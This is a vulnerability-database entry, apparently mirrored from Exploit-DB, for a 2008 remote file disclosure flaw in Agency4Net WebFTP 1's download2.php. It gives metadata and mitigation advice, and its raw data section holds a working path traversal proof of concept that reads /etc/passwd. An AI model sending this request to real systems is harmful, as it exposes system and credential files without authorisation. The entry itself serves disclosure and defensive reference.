header-logo
Suggest Exploit
vendor:
WebFTP
by:
milw0rm.com
8.5
CVSS
HIGH
Remote File Disclosure
200
CWE
Product Name: WebFTP
Affected Version From: 1
Affected Version To: 1
Patch Exists: YES
Related CWE: N/A
CPE: a:agency4net:webftp:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Agency4Net WebFTP 1 download2.php Remote File Disclosure Vulnerability

Agency4Net WebFTP 1 download2.php is prone to a remote file-disclosure vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to view sensitive files from the affected computer, potentially resulting in a loss of confidentiality.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

    ########                  ######              ####                ######  ######
  ##      ##                    ##                  ##                  ####  ####  
  ##              ######        ##            ####  ##                  ####  ####  
  ##            ##      ##      ##          ##    ####                  ##  ##  ##  
  ##    ######  ##      ##      ##    ##    ##      ##                  ##      ##  
  ##      ##    ##      ##      ##    ##    ##      ##                  ##      ##  
    ######        ######      ##########      ##########              ######  ######
                                                        ##############              

####################################################################################
###### AGENCY4NET WEBFTP 1 download2.php Remote File Disclosure Vulnerability  #####
###### http://sourceforge.net/project/platformdownload.php?group_id=206982     #####
###### POC :                                                                   #####
###### /Script/download2.php?file=../../../../../../../../../../../etc/passwd  #####
###### D0rk :  :(                                                              #####
###### TrYaG-TeaM [Tryag.com/cc], H-T Team , RoMaNcYxHaCkEr , Asb-May's Team   #####
####################################################################################

# milw0rm.com [2008-01-01]

Navigation

Suggest Exploit

Services By CQR